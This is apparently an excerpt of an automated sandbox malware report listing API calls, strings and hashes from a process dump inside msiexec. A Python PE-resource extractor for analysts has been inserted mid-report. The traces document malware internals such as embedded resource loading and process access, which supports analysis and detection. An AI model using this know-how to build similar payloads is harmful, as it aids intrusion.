• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: memcpywcslen$_snwprintfmemset
• String ID: %s (%s)$YV@
• API String ID: 3979103747-598926743
• Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
• Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
• Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
• Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9

APIs
• LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
• FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
• wcslen.MSVCRT ref: 0040A6B1
• wcscpy.MSVCRT ref: 0040A6C1
• LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
• wcscpy.MSVCRT ref: 0040A6DB
Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2767993716-572158859
• Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
• Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
• Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
• Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D

                                                              APIs
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                              • API String ID: 3176057301-2039793938
                                                              • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                              • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                              APIs
                                                              Strings
                                                              • database %s is already in use, xrefs: 0042F6C5
                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                              • database is already attached, xrefs: 0042F721
                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                              • unable to open database: %s, xrefs: 0042F84E
                                                              • out of memory, xrefs: 0042F865
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                              • API String ID: 1297977491-2001300268
                                                              • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                              • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                              APIs
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                              • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                              • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                              • String ID: ($d
                                                              • API String ID: 1140211610-1915259565
                                                              • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                              • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                              APIs
                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                              • String ID:
                                                              • API String ID: 3015003838-0
                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                              APIs
                                                              • memset.MSVCRT ref: 00407E44
                                                              • memset.MSVCRT ref: 00407E5B
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                              • wcscpy.MSVCRT ref: 00407F10
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                              • String ID:
                                                              • API String ID: 59245283-0
                                                              • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                              • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                              APIs
                                                              • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                              • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                              • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                              • API String ID: 3510742995-3273207271
                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                              • memset.MSVCRT ref: 00413ADC
                                                              • memset.MSVCRT ref: 00413AEC
                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                              • memset.MSVCRT ref: 00413BD7
                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                              • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                              • String ID: 3A
                                                              • API String ID: 3300951397-293699754
                                                              • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                              • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                              • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                              • String ID: strings
                                                              • API String ID: 3166385802-3030018805
                                                              • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                              • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                              APIs
                                                              • memset.MSVCRT ref: 0041249C
                                                              • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                              • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                              • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                              • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                              • wcscpy.MSVCRT ref: 004125A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                              • String ID: r!A
                                                              • API String ID: 2791114272-628097481
                                                              • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                              • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                              • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                              • String ID: BIN
                                                              • API String ID: 1668488027-1015027815
                                                              • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                              • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
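The function above reproduces the classic Win32 resource-loading sequence, FindResourceW(hModule, MAKEINTRESOURCE(0x32), L"BIN") followed by LoadResource, SizeofResource, LockResource and a memcpy into a private buffer, i.e. the sample pulls a blob out of its own resource section at run time. An analyst usually wants that blob without running anything, so the following is a static equivalent written for this page as an added example (it is neither Joe Sandbox's nor the sample's code): it parses the PE headers, walks the three-level resource directory and returns the bytes of a resource addressed by type string and integer name. Assumptions: a memory-dumped image such as the one this report describes is laid out by RVA, so `mapped=True` uses the identity mapping instead of the section table; the first language entry is taken, whereas FindResourceW picks by thread locale; `build_sample_pe` is a constructed fixture, not the real binary, and is there only so the example runs offline.

```python
"""Static equivalent of FindResourceW / SizeofResource / LockResource.
Added example; not Joe Sandbox or sample code.  Only struct is used."""
import struct

def _rva_to_offset(pe, rva, mapped):
    """Map an RVA to an offset into `pe`.  A memory dump of a loaded image is
    already laid out by RVA (identity); an on-disk PE needs the section table."""
    if mapped:
        return rva
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]        # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]   # SizeOfOptionalHeader
    sec_off = e_lfanew + 24 + opt_size                          # first IMAGE_SECTION_HEADER
    for i in range(nsec):
        vsize, vaddr, rsize, raw = struct.unpack_from("<IIII", pe, sec_off + i * 40 + 8)
        if vaddr <= rva < vaddr + max(vsize, rsize):
            return rva - vaddr + raw
    raise ValueError("RVA %#x not inside any section" % rva)

def _resource_dir(pe):
    """(rva, size) of data directory entry 2, IMAGE_DIRECTORY_ENTRY_RESOURCE."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    dd = opt + (96 if magic == 0x10B else 112)      # PE32 vs PE32+ data-directory start
    return struct.unpack_from("<II", pe, dd + 2 * 8)

def _entries(pe, base, dir_off):
    """Yield (id_or_name, is_subdir, child_off) for one IMAGE_RESOURCE_DIRECTORY."""
    n_named, n_id = struct.unpack_from("<HH", pe, base + dir_off + 12)
    for i in range(n_named + n_id):
        name, data = struct.unpack_from("<II", pe, base + dir_off + 16 + i * 8)
        if name & 0x80000000:                        # IMAGE_RESOURCE_DIR_STRING_U
            s = base + (name & 0x7FFFFFFF)
            length = struct.unpack_from("<H", pe, s)[0]
            key = pe[s + 2:s + 2 + 2 * length].decode("utf-16-le")
        else:
            key = name & 0xFFFF                      # MAKEINTRESOURCE id
        yield key, bool(data & 0x80000000), data & 0x7FFFFFFF

def find_resource(pe, res_type, res_name, mapped=False):
    """Bytes of resource (res_type, res_name) or None.  Either key may be an int
    or a str; strings match case-insensitively as FindResourceW does.  The first
    language entry wins (FindResourceW would honour the thread locale)."""
    rsrc_rva, _ = _resource_dir(pe)
    base = _rva_to_offset(pe, rsrc_rva, mapped)

    def match(key, want):
        if isinstance(want, int):
            return key == want
        return isinstance(key, str) and key.lower() == want.lower()

    for tkey, tdir, toff in _entries(pe, base, 0):              # level 1: type
        if not (tdir and match(tkey, res_type)):
            continue
        for nkey, ndir, noff in _entries(pe, base, toff):       # level 2: name / id
            if not (ndir and match(nkey, res_name)):
                continue
            for _lang, ldir, loff in _entries(pe, base, noff):  # level 3: language
                if ldir:
                    continue
                data_rva, size = struct.unpack_from("<II", pe, base + loff)  # IMAGE_RESOURCE_DATA_ENTRY
                off = _rva_to_offset(pe, data_rva, mapped)
                return pe[off:off + size]
    return None

def build_sample_pe(payload, res_type="BIN", res_id=50, mapped=False):
    """Constructed PE32 fixture (not the real sample): one .rsrc section with a
    single resource shaped like the one loaded above, type "BIN", name 50.
    With mapped=True the section sits at its RVA while PointerToRawData keeps
    the on-disk value, mimicking a memory dump."""
    rsrc_rva, raw_ptr = 0x1000, 0x200
    hdr = lambda n_named, n_id: struct.pack("<IIHHHH", 0, 0, 0, 0, n_named, n_id)
    ent = lambda name, off: struct.pack("<II", name, off)
    rsrc = (hdr(1, 0) + ent(0x80000000 | 88, 0x80000000 | 24)     # root -> named type @88
            + hdr(0, 1) + ent(res_id, 0x80000000 | 48)             # type dir -> id
            + hdr(0, 1) + ent(0x409, 72)                            # name dir -> lang -> data entry
            + struct.pack("<IIII", rsrc_rva + 96, len(payload), 0, 0)
            + struct.pack("<H", len(res_type)) + res_type.encode("utf-16-le")
            + payload)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112, rsrc_rva, len(rsrc))         # resource directory
    sec = struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), rsrc_rva, len(rsrc),
                      raw_ptr, 0, 0, 0, 0, 0x40000040)
    head = dos + coff + bytes(opt) + sec
    place_at = rsrc_rva if mapped else raw_ptr
    return head + b"\0" * (place_at - len(head)) + rsrc

if __name__ == "__main__":
    img = build_sample_pe(b"constructed embedded payload")
    blob = find_resource(img, "BIN", 50)
    print("BIN/50 resource: %d bytes" % len(blob))
```

Run it against the dumped image from this report with `find_resource(open(path, "rb").read(), "BIN", 50, mapped=True)`; for the original file on disk drop the flag. The two modes matter: a dump keeps the on-disk PointerToRawData values in its section table, so using them on a dump lands in padding and the lookup silently finds nothing.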
                                                              APIs
                                                              • memset.MSVCRT ref: 00411AF6
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                              • wcscat.MSVCRT ref: 00411B2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                              • String ID: AE$.cfg$General$EA
                                                              • API String ID: 776488737-1622828088
                                                              • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                              • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D8BD
                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                              • memset.MSVCRT ref: 0040D906
                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                              • String ID: sysdatetimepick32
                                                              • API String ID: 1028950076-4169760276
                                                              • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                              • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                              APIs
                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                              • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                              • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                              • memset.MSVCRT ref: 0041BA3D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: -journal$-wal
                                                              • API String ID: 438689982-2894717839
                                                              • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                              • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Item$Dialog$MessageSend
                                                              • String ID:
                                                              • API String ID: 3975816621-0
                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 00444D09
